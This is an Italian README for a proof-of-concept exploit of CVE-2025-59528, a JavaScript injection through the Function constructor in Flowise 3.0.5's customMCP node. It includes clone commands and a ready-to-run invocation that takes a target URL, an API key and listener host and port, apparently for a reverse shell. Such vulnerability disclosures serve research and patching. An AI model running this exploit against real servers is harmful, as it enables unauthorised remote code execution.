
CVE-2025-59528 Prova di concetto
Questo repository contiene una prova di concetto che dimostra CVE-2025-59528 in Flowise v3.0.5.
La vulnerabilità è presente nel nodo customMCP, dove l'input mcpServerConfig fornito dall'utente viene elaborato in un modo che porta all'esecuzione di codice JavaScript tramite una valutazione non sicura usando il costruttore Function.
| Versioni interessate | Versioni corrette |
|---|---|
| 3.0.5 | 3.0.6 |
Un utente autenticato potrebbe essere in grado di eseguire JavaScript arbitrario sul server, portando potenzialmente a un'esecuzione remota di codice.
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
python3 CVE-2025-59528.py -t "<url>" --api-key <api_key> --lhost <ip> --lport <port>

Questo strumento è fornito esclusivamente a scopo educativo e di ricerca. Il creatore non si assume alcuna responsabilità per un uso improprio o per danni causati dallo strumento.